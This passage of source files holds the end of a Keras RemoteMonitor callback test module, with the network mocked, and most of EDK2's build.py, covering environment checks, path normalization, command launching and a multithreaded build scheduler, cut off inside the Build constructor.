                  metrics=['accuracy'])

    monitor = callbacks.RemoteMonitor()
    # Stub out the network; no real server is contacted.
    with patch('requests.post'):
        model.fit(X_train, y_train, batch_size=batch_size,
                  validation_data=(X_test, y_test), callbacks=[monitor],
                  epochs=1)
def tests_RemoteMonitorWithJsonPayload():
    """Training with RemoteMonitor(send_as_json=True) must complete when the
    HTTP POSTs are mocked out; exercises the JSON payload path."""
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_train = np_utils.to_categorical(y_train)
    y_test = np_utils.to_categorical(y_test)

    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(optimizer='rmsprop',
                  loss='categorical_crossentropy',
                  metrics=['accuracy'])

    monitor = callbacks.RemoteMonitor(send_as_json=True)
    # Stub out the network; no real server is contacted.
    with patch('requests.post'):
        model.fit(X_train, y_train, batch_size=batch_size,
                  validation_data=(X_test, y_test), callbacks=[monitor],
                  epochs=1)
if __name__ == '__main__':
    # Allow running this test module directly, outside the pytest CLI.
    pytest.main([__file__])
|
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
import multiprocessing
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds
from collections import OrderedDict,defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2017, Intel Corporation All rights reserved."

## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']

## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"

# Matches temporary table names of the form "_<n>_<n>_<hex>"; presumably
# used to recognize/clean up workspace-database tables -- TODO confirm.
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
#   If the tool is found in the PATH, then True is returned
#   Otherwise, False is returned
#
#   @param  tool    Base name of the executable to look for
#
#   @retval True    if <tool>[<ext>] exists in a directory listed in PATH
#   @retval False   otherwise
#
def IsToolInPath(tool):
    # On Windows, PATHEXT lists the executable suffixes (".exe", ".bat", ...)
    # to try in addition to the bare name; elsewhere only the bare name is
    # checked. Use the `in` operator instead of dict.has_key(): has_key()
    # was removed in Python 3, and the rest of this file already tests
    # os.environ membership with `in`/`not in`.
    if 'PATHEXT' in os.environ:
        extns = os.environ['PATHEXT'].split(os.path.pathsep)
    else:
        extns = ('',)
    for pathDir in os.environ['PATH'].split(os.path.pathsep):
        for ext in extns:
            if os.path.exists(os.path.join(pathDir, tool + ext)):
                return True
    return False
## Check environment variables
#
#  Check environment variables that must be set for build. Currently they are
#
#   WORKSPACE           The directory all packages/platforms start from
#   EDK_TOOLS_PATH      The directory contains all tools needed by the build
#   PATH                $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
#   If any of above environment variable is not set or has error, the build
#   will be broken.
#
def CheckEnvVariable():
    # check WORKSPACE
    if "WORKSPACE" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="WORKSPACE")

    # Normalize and write the canonical form back so later os.environ reads
    # see a consistent, case-folded path.
    WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
    if not os.path.exists(WorkspaceDir):
        EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
    elif ' ' in WorkspaceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
                        ExtraData=WorkspaceDir)
    os.environ["WORKSPACE"] = WorkspaceDir

    # set multiple workspace
    PackagesPath = os.getenv("PACKAGES_PATH")
    mws.setWs(WorkspaceDir, PackagesPath)
    if mws.PACKAGES_PATH:
        for Path in mws.PACKAGES_PATH:
            if not os.path.exists(Path):
                EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData="%s" % Path)
            elif ' ' in Path:
                EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)

    #
    # Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
    #
    # Missing ECP/EFI/EDK source variables default to the compatibility
    # package inside the workspace.
    if "ECP_SOURCE" not in os.environ:
        os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
    if "EFI_SOURCE" not in os.environ:
        os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
    if "EDK_SOURCE" not in os.environ:
        os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]

    #
    # Unify case of characters on case-insensitive systems
    #
    EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
    EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
    EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))

    os.environ["EFI_SOURCE"] = EfiSourceDir
    os.environ["EDK_SOURCE"] = EdkSourceDir
    os.environ["ECP_SOURCE"] = EcpSourceDir
    os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])

    # A missing ECP tree is only a verbose note (Edk modules just can't be
    # built), but a space in the path is always fatal.
    if not os.path.exists(EcpSourceDir):
        EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
    elif ' ' in EcpSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
                        ExtraData=EcpSourceDir)
    if not os.path.exists(EdkSourceDir):
        if EdkSourceDir == EcpSourceDir:
            EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
        else:
            EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
                            ExtraData=EdkSourceDir)
    elif ' ' in EdkSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
                        ExtraData=EdkSourceDir)
    if not os.path.exists(EfiSourceDir):
        if EfiSourceDir == EcpSourceDir:
            EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
        else:
            EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
                            ExtraData=EfiSourceDir)
    elif ' ' in EfiSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
                        ExtraData=EfiSourceDir)

    # check those variables on single workspace case
    if not PackagesPath:
        # change absolute path to relative path to WORKSPACE
        if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
            EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
                            ExtraData="WORKSPACE = %s\n    EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
        if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
            EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
                            ExtraData="WORKSPACE = %s\n    EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
        if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
            EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
                            ExtraData="WORKSPACE = %s\n    ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))

    # check EDK_TOOLS_PATH
    if "EDK_TOOLS_PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="EDK_TOOLS_PATH")

    # check PATH
    if "PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="PATH")

    # Publish the validated paths to the rest of the build via GlobalData.
    GlobalData.gWorkspace = WorkspaceDir
    GlobalData.gEfiSource = EfiSourceDir
    GlobalData.gEdkSource = EdkSourceDir
    GlobalData.gEcpSource = EcpSourceDir

    GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
    GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
    GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
    GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
    GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
#   Convert the path to be local format, and remove the WORKSPACE path at the
#   beginning if the file path is given in full path.
#
#   @param  FilePath        File path to be normalized
#   @param  Workspace       Workspace path which the FilePath will be checked against
#
#   @retval string          The normalized file path
#
def NormFile(FilePath, Workspace):
    # check if the path is absolute or relative
    if os.path.isabs(FilePath):
        FileFullPath = os.path.normpath(FilePath)
    else:
        FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
        # mws.getWs resolves which workspace (of possibly several) actually
        # contains the relative path, so the strip below removes the right
        # prefix.
        Workspace = mws.getWs(Workspace, FilePath)

    # check if the file path exists or not
    if not os.path.isfile(FileFullPath):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)

    # remove workspace directory from the beginning part of the file path
    # (the +1 skips the path separator when Workspace has no trailing slash)
    if Workspace[-1] in ["\\", "/"]:
        return FileFullPath[len(Workspace):]
    else:
        return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
#   Thread entry point that drains a stream produced by an external program,
#   forwarding each stripped line to the given sink callable.
#
#   @param  From        The stream message read from
#   @param  To          Callable invoked with each (rstripped) line
#   @param  ExitFlag    Event-like flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
    while True:
        # read one line a time
        Line = From.readline()
        # an empty string means the stream reached EOF -- stop reading
        if not Line:
            break
        To(Line.rstrip())
        # honour an external stop request, but only after forwarding the
        # line that was already read
        if ExitFlag.isSet():
            break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
#   @param  Command             A list or string containing the call of the program
#   @param  WorkingDir          The directory in which the program will be running
#
#   @retval string              Elapsed wall-clock time formatted as "<n>ms"
#
def LaunchCommand(Command, WorkingDir):
    BeginTime = time.time()
    # if working directory doesn't exist, Popen() will raise an exception
    if not os.path.isdir(WorkingDir):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)

    # Command is used as the first Argument in following Popen().
    # It could be a string or sequence. We find that if command is a string in following Popen(),
    # ubuntu may fail with an error message that the command is not found.
    # So here we may need convert command from string to list instance.
    if platform.system() != 'Windows':
        if not isinstance(Command, list):
            Command = Command.split()
        # re-join so shell=True receives a single command string
        Command = ' '.join(Command)

    Proc = None
    EndOfProcedure = None
    try:
        # launch the command
        Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)

        # launch two threads to read the STDOUT and STDERR
        EndOfProcedure = Event()
        EndOfProcedure.clear()
        if Proc.stdout:
            StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
            StdOutThread.setName("STDOUT-Redirector")
            StdOutThread.setDaemon(False)
            StdOutThread.start()

        if Proc.stderr:
            StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
            StdErrThread.setName("STDERR-Redirector")
            StdErrThread.setDaemon(False)
            StdErrThread.start()

        # waiting for program exit
        Proc.wait()
    except: # in case of aborting
        # terminate the threads redirecting the program output
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        if EndOfProcedure is not None:
            EndOfProcedure.set()
        if Proc is None:
            # Popen itself failed, i.e. the command never started
            if type(Command) != type(""):
                Command = " ".join(Command)
            EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))

    # wait until both redirector threads have drained the pipes
    if Proc.stdout:
        StdOutThread.join()
    if Proc.stderr:
        StdErrThread.join()

    # check the return code of the program
    if Proc.returncode != 0:
        if type(Command) != type(""):
            Command = " ".join(Command)
        # print out the Response file and its content when make failure
        RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
        if os.path.isfile(RespFile):
            f = open(RespFile)
            RespContent = f.read()
            f.close()
            EdkLogger.info(RespContent)

        EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
    return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
    ## The constructor
    #
    #   @param  self        The object pointer
    #   @param  Obj         The object the build is working on
    #   @param  BuildCommand    The command (list) used to build Obj; must be non-empty
    #   @param  Target      The build target name, one of gSupportedTarget
    #   @param  Dependency  The BuildUnit(s) which must be completed in advance
    #   @param  WorkingDir  The directory build command starts in
    #
    def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
        self.BuildObject = Obj
        self.Dependency = Dependency
        self.WorkingDir = WorkingDir
        self.Target = Target
        self.BuildCommand = BuildCommand
        # An empty build command means tools_def.txt is missing the MAKE
        # tool for this target/toolchain/arch combination -- fail early.
        if not BuildCommand:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
                            ExtraData=str(Obj))

    ## str() method
    #
    #   It just returns the string representation of self.BuildObject
    #
    #   @param  self        The object pointer
    #
    def __str__(self):
        return str(self.BuildObject)

    ## "==" operator method
    #
    #   It just compares self.BuildObject with "Other". So self.BuildObject must
    #   provide its own __eq__() method.
    #
    #   @param  self        The object pointer
    #   @param  Other       The other BuildUnit object compared to
    #
    def __eq__(self, Other):
        return Other and self.BuildObject == Other.BuildObject \
                and Other.BuildObject \
                and self.BuildObject.Arch == Other.BuildObject.Arch

    ## hash() method
    #
    #   It just returns the hash value of self.BuildObject which must be hashable.
    #   Arch is folded in so it stays consistent with __eq__.
    #
    #   @param  self        The object pointer
    #
    def __hash__(self):
        return hash(self.BuildObject) + hash(self.BuildObject.Arch)

    def __repr__(self):
        return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
    ## The constructor
    #
    #   @param  self        The object pointer
    #   @param  Obj         The ModuleAutoGen object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        # A module build unit depends on build units for all libraries it links.
        Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
        # The default/"all" target is mapped to the module-level "tbuild"
        # make target.
        if Target in [None, "", "all"]:
            self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
    ## The constructor
    #
    #   @param  self        The object pointer
    #   @param  Obj         The PlatformAutoGen object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        # Bug fix: the dependency lists must be derived from the Obj
        # parameter. The previous code read self.BuildObject here, but that
        # attribute is only assigned later by BuildUnit.__init__, so the
        # lookup raised AttributeError before the base constructor ran.
        # A platform build unit depends on build units for every library and
        # every module of the platform.
        Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
        Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
# All queues/flags below are class-level, so there is one scheduler state
# shared by every BuildTask in the process.
#
class BuildTask:
    # queue for tasks waiting for schedule
    _PendingQueue = OrderedDict()
    _PendingQueueLock = threading.Lock()

    # queue for tasks ready for running
    _ReadyQueue = OrderedDict()
    _ReadyQueueLock = threading.Lock()

    # queue for run tasks
    _RunningQueue = OrderedDict()
    _RunningQueueLock = threading.Lock()

    # queue containing all build tasks, in case duplicate build
    _TaskQueue = OrderedDict()

    # flag indicating error occurs in a running thread
    _ErrorFlag = threading.Event()
    _ErrorFlag.clear()
    _ErrorMessage = ""

    # BoundedSemaphore object used to control the number of running threads
    _Thread = None

    # flag indicating if the scheduler is started or not
    _SchedulerStopped = threading.Event()
    _SchedulerStopped.set()

    ## Start the task scheduler thread
    #
    #   @param  MaxThreadNumber     The maximum thread number
    #   @param  ExitFlag            Flag used to end the scheduler
    #
    @staticmethod
    def StartScheduler(MaxThreadNumber, ExitFlag):
        SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
        SchedulerThread.setName("Build-Task-Scheduler")
        SchedulerThread.setDaemon(False)
        SchedulerThread.start()
        # wait for the scheduler to be started, especially useful in Linux
        while not BuildTask.IsOnGoing():
            time.sleep(0.01)

    ## Scheduler method
    #
    #   Runs on the scheduler thread: moves tasks pending -> ready -> running
    #   until there is no more work and ExitFlag is set, or an error occurs.
    #
    #   @param  MaxThreadNumber     The maximum thread number
    #   @param  ExitFlag            Flag used to end the scheduler
    #
    @staticmethod
    def Scheduler(MaxThreadNumber, ExitFlag):
        BuildTask._SchedulerStopped.clear()
        try:
            # use BoundedSemaphore to control the maximum running threads
            BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)

            #
            # scheduling loop, which will exits when no pending/ready task and
            # indicated to do so, or there's error in running thread
            #
            while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
                   or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
                EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
                                % (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))

                # get all pending tasks
                BuildTask._PendingQueueLock.acquire()
                BuildObjectList = BuildTask._PendingQueue.keys()
                #
                # check if their dependency is resolved, and if true, move them
                # into ready queue
                #
                for BuildObject in BuildObjectList:
                    Bt = BuildTask._PendingQueue[BuildObject]
                    if Bt.IsReady():
                        BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
                BuildTask._PendingQueueLock.release()

                # launch build thread until the maximum number of threads is reached
                while not BuildTask._ErrorFlag.isSet():
                    # empty ready queue, do nothing further
                    if len(BuildTask._ReadyQueue) == 0:
                        break

                    # wait for active thread(s) exit
                    BuildTask._Thread.acquire(True)

                    # start a new build thread
                    Bo,Bt = BuildTask._ReadyQueue.popitem()

                    # move into running queue
                    BuildTask._RunningQueueLock.acquire()
                    BuildTask._RunningQueue[Bo] = Bt
                    BuildTask._RunningQueueLock.release()

                    Bt.Start()
                    # avoid tense loop
                    time.sleep(0.01)

                # avoid tense loop
                time.sleep(0.01)

            # wait for all running threads exit
            if BuildTask._ErrorFlag.isSet():
                EdkLogger.quiet("\nWaiting for all build threads exit...")
            # while not BuildTask._ErrorFlag.isSet() and \
            while len(BuildTask._RunningQueue) > 0:
                EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
                EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
                # avoid tense loop
                time.sleep(0.1)
        except BaseException, X:
            #
            # TRICK: hide the output of threads left runing, so that the user can
            #        catch the error message easily
            #
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)

        BuildTask._PendingQueue.clear()
        BuildTask._ReadyQueue.clear()
        BuildTask._RunningQueue.clear()
        BuildTask._TaskQueue.clear()
        BuildTask._SchedulerStopped.set()

    ## Wait for all running method exit
    #
    @staticmethod
    def WaitForComplete():
        BuildTask._SchedulerStopped.wait()

    ## Check if the scheduler is running or not
    #
    @staticmethod
    def IsOnGoing():
        return not BuildTask._SchedulerStopped.isSet()

    ## Abort the build
    @staticmethod
    def Abort():
        if BuildTask.IsOnGoing():
            BuildTask._ErrorFlag.set()
            BuildTask.WaitForComplete()

    ## Check if there's error in running thread
    #
    #   Since the main thread cannot catch exceptions in other thread, we have to
    #   use threading.Event to communicate this formation to main thread.
    #
    @staticmethod
    def HasError():
        return BuildTask._ErrorFlag.isSet()

    ## Get error message in running thread
    #
    #   Since the main thread cannot catch exceptions in other thread, we have to
    #   use a static variable to communicate this message to main thread.
    #
    @staticmethod
    def GetErrorMessage():
        return BuildTask._ErrorMessage

    ## Factory method to create a BuildTask object
    #
    #   This method will check if a module is building or has been built. And if
    #   true, just return the associated BuildTask object in the _TaskQueue. If
    #   not, create and return a new BuildTask object. The new BuildTask object
    #   will be appended to the _PendingQueue for scheduling later.
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    @staticmethod
    def New(BuildItem, Dependency=None):
        if BuildItem in BuildTask._TaskQueue:
            Bt = BuildTask._TaskQueue[BuildItem]
            return Bt

        Bt = BuildTask()
        Bt._Init(BuildItem, Dependency)
        BuildTask._TaskQueue[BuildItem] = Bt

        BuildTask._PendingQueueLock.acquire()
        BuildTask._PendingQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.release()

        return Bt

    ## The real constructor of BuildTask
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    def _Init(self, BuildItem, Dependency=None):
        self.BuildItem = BuildItem

        self.DependencyList = []
        if Dependency is None:
            Dependency = BuildItem.Dependency
        else:
            Dependency.extend(BuildItem.Dependency)
        self.AddDependency(Dependency)
        # flag indicating build completes, used to avoid unnecessary re-build
        self.CompleteFlag = False

    ## Check if all dependent build tasks are completed or not
    #
    def IsReady(self):
        ReadyFlag = True
        for Dep in self.DependencyList:
            if Dep.CompleteFlag == True:
                continue
            ReadyFlag = False
            break

        return ReadyFlag

    ## Add dependent build task
    #
    #   @param  Dependency      The list of dependent build objects
    #
    def AddDependency(self, Dependency):
        for Dep in Dependency:
            # binary (pre-built) modules need no build task of their own
            if not Dep.BuildObject.IsBinaryModule:
                self.DependencyList.append(BuildTask.New(Dep))    # BuildTask list

    ## The thread wrapper of LaunchCommand function
    #
    # @param  Command               A list or string contains the call of the command
    # @param  WorkingDir            The directory in which the program will be running
    #
    def _CommandThread(self, Command, WorkingDir):
        try:
            self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
            self.CompleteFlag = True
        except:
            #
            # TRICK: hide the output of threads left runing, so that the user can
            #        catch the error message easily
            #
            if not BuildTask._ErrorFlag.isSet():
                GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
                                                                  self.BuildItem.BuildObject.Arch,
                                                                  self.BuildItem.BuildObject.ToolChain,
                                                                  self.BuildItem.BuildObject.BuildTarget
                                                                 )
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "%s broken\n    %s [%s]" % \
                                      (threading.currentThread().getName(), Command, WorkingDir)
        # indicate there's a thread is available for another build task
        BuildTask._RunningQueueLock.acquire()
        BuildTask._RunningQueue.pop(self.BuildItem)
        BuildTask._RunningQueueLock.release()
        BuildTask._Thread.release()

    ## Start build task thread
    #
    def Start(self):
        EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
        Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
        self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
        self.BuildTread.setName("build thread")
        self.BuildTread.setDaemon(False)
        self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
    ## Constructor
    #
    # Constructor will load all required image information.
    #
    #   @param  BaseName          The full file path of image.
    #   @param  Guid              The GUID for image.
    #   @param  Arch              Arch of this image.
    #   @param  OutputDir         The output directory for image.
    #   @param  DebugDir          The debug directory for image.
    #   @param  ImageClass        PeImage Information
    #
    def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
        self.BaseName = BaseName
        self.Guid = Guid
        self.Arch = Arch
        self.OutputDir = OutputDir
        self.DebugDir = DebugDir
        self.Image = ImageClass
        # Round the image size up to a 0x1000 (4 KiB) boundary. NOTE(review):
        # because of the unconditional "+ 1" this adds a full extra 0x1000
        # even when Size is already aligned; relies on Python 2 integer
        # division -- confirm both are intended before changing.
        self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
    def __init__(self, Target, WorkspaceDir, BuildOptions):
        # Build parameters taken straight from the command-line options object.
        self.WorkspaceDir = WorkspaceDir
        self.Target = Target
        self.PlatformFile = BuildOptions.PlatformFile
        self.ModuleFile = BuildOptions.ModuleFile
        self.ArchList = BuildOptions.TargetArch
        self.ToolChainList = BuildOptions.ToolChain
        self.BuildTargetList= BuildOptions.BuildTarget
        self.Fdf = BuildOptions.FdfFile
        self.FdList = BuildOptions.RomImage
        self.FvList = BuildOptions.FvImage
        self.CapList = BuildOptions.CapName
        self.SilentMode = BuildOptions.SilentMode
        self.ThreadNumber = BuildOptions.ThreadNumber
        self.SkipAutoGen = BuildOptions.SkipAutoGen
        self.Reparse = BuildOptions.Reparse
        self.SkuId = BuildOptions.SkuId
        if self.SkuId:
            # Make the command-line SKU selection visible to other phases via GlobalData.
            GlobalData.gSKUID_CMD = self.SkuId
        self.ConfDirectory = BuildOptions.ConfDirectory
        self.SpawnMode = True
        self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
        self.TargetTxt = TargetTxtClassObject()
        self.ToolDef = ToolDefClassObject()
        # Timing accumulators for the AutoGen / make / GenFds phases.
        self.AutoGenTime = 0
        self.MakeTime = 0
        self.GenFdsTime = 0
        GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
        #Set global flag for build mode
        GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
        GlobalData.gUseHashCache = BuildOptions.UseHashCache
        GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
        GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
        GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
        # Binary cache options are only valid together with --hash, and the
        # source/destination forms are mutually exclusive.
        if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
        if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
        if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
        if GlobalData.gBinCacheSource:
            # A relative cache-source path is resolved against the workspace.
            BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
